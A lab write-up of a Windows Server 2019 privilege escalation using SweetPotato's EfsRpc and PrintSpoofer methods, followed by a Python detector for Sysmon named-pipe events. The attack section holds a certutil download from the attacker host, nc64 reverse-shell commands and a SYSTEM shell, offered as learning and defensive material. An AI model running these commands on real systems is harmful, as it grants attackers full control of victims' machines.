SweetPotato
Both the SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege privileges were found enabled for the service account nt authority\local service. This makes the target system vulnerable to the potato family of exploits.
I would usually use JuicyPotato for token impersonation, but it does not work on Windows 10 1809 / Windows Server 2019 and later. The target system is Windows Server 2019, so I will be using an alternative: SweetPotato.
Exploit
SweetPotato is a collection of various native Windows privilege escalation techniques from service accounts to SYSTEM. It was created by @ethicalchaos and includes:
- RottenPotato
- Weaponized JuicyPotato with BITS WinRM discovery
- PrintSpoofer discovery and original exploit
- EfsRpc built on EfsPotato
- PetitPotam
Exploitation
PS C:\tmp> cmd /c certutil.exe -urlcache -split -f http://192.168.45.157/SweetPotato.exe C:\\tmp\\SweetPotato.exe
**** Online ****
000000 ...
0e2200
CertUtil: -URLCache command completed successfully.
Delivery complete
PS C:\tmp> cmd /c C:\\tmp\\SweetPotato.exe -p "C:\\tmp\\nc64.exe" -e EfsRpc -a "192.168.45.157 1234 -e powershell"
cmd /c C:\\tmp\\SweetPotato.exe -p "C:\\tmp\\nc64.exe" -e EfsRpc -a "192.168.45.157 1234 -e powershell"
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method EfsRpc to launch C:\\tmp\\nc64.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/65af89dd-ed79-404d-a031-51a699c1114b/\65af89dd-ed79-404d-a031-51a699c1114b\65af89dd-ed79-404d-a031-51a699c1114b
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
The command above uses the EfsRpc method, which targets the MS-EFSR EfsRpcOpenFileRaw call and relies on SeImpersonatePrivilege to impersonate the service that connects back to the attacker-controlled pipe.
PS C:\tmp> cmd /c C:\\tmp\\SweetPotato.exe -p "C:\\tmp\\nc64.exe" -e PrintSpoofer -a "192.168.45.157 1234 -e powershell"
cmd /c C:\\tmp\\SweetPotato.exe -p "C:\\tmp\\nc64.exe" -e PrintSpoofer -a "192.168.45.157 1234 -e powershell"
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method PrintSpoofer to launch C:\\tmp\\nc64.exe
[+] Triggering notification on evil PIPE \\SQUID/pipe/ed3c548c-87b1-4f4d-9bee-7df927ca09bd
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
The embedded PrintSpoofer method works too.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/squid]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.135.189] 50419
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
SQUID
PS C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.135.189
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.135.254
System Level Compromise
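As an added detection-side example (not from this writeup or from the SweetPotato project), the snippet below correlates Sysmon-style named-pipe events (ID 17 PipeCreated, ID 18 PipeConnected) to flag the pattern both the EfsRpc and PrintSpoofer runs above depend on: a GUID-named pipe created by a process outside C:\Windows that a System32 service process then connects to. The event line format, image paths and pipe names are constructed for the example and only mirror the GUID pipes printed in the tool output.

```python
import re

# Constructed Sysmon-style pipe events reduced to "event_id|image|pipe_name"
# lines (ID 17 = PipeCreated, ID 18 = PipeConnected). The GUID pipes mirror
# the shapes printed by the EfsRpc and PrintSpoofer runs above; the last two
# lines are ordinary Windows pipes included as benign noise.
SAMPLE_EVENTS = """\
17|C:\\tmp\\SweetPotato.exe|\\65af89dd-ed79-404d-a031-51a699c1114b\\65af89dd-ed79-404d-a031-51a699c1114b
18|C:\\Windows\\System32\\lsass.exe|\\65af89dd-ed79-404d-a031-51a699c1114b\\65af89dd-ed79-404d-a031-51a699c1114b
17|C:\\tmp\\SweetPotato.exe|\\ed3c548c-87b1-4f4d-9bee-7df927ca09bd
18|C:\\Windows\\System32\\spoolsv.exe|\\ed3c548c-87b1-4f4d-9bee-7df927ca09bd
17|C:\\Windows\\System32\\svchost.exe|\\wkssvc
18|C:\\Windows\\System32\\lsass.exe|\\lsass
"""

GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
# Pipe names whose first path segment is a bare GUID (constructed heuristic).
GUID_PIPE = re.compile(rf"^\\{GUID}(\\|$)", re.IGNORECASE)


def parse_events(text):
    """Yield (event_id, image, pipe) tuples from 'id|image|pipe' lines."""
    for line in text.splitlines():
        if line.strip():
            event_id, image, pipe = line.split("|", 2)
            yield int(event_id), image, pipe


def is_guid_named_pipe(pipe):
    """True when the pipe name starts with a bare GUID segment."""
    return GUID_PIPE.match(pipe) is not None


def find_suspicious_pipes(text):
    """Return GUID-named pipes created by an image outside C:\\Windows that a
    System32 service process later connected to (the pipe-impersonation shape)."""
    created = {}  # pipe name -> image that created it
    hits = []
    for event_id, image, pipe in parse_events(text):
        if not is_guid_named_pipe(pipe):
            continue
        img = image.lower()
        if event_id == 17 and not img.startswith("c:\\windows\\"):
            created[pipe] = image
        elif event_id == 18 and pipe in created and img.startswith("c:\\windows\\system32\\"):
            hits.append({"pipe": pipe, "creator": created[pipe], "connector": image})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_pipes(SAMPLE_EVENTS):
        print(f"[!] {hit['connector']} connected to {hit['creator']}'s pipe {hit['pipe']}")
```

On a real host the same correlation would run over exported Sysmon events with the PipeName and Image fields extracted; pairing the creating image with the connecting service is what separates this from the many legitimate GUID-named pipes Windows itself creates.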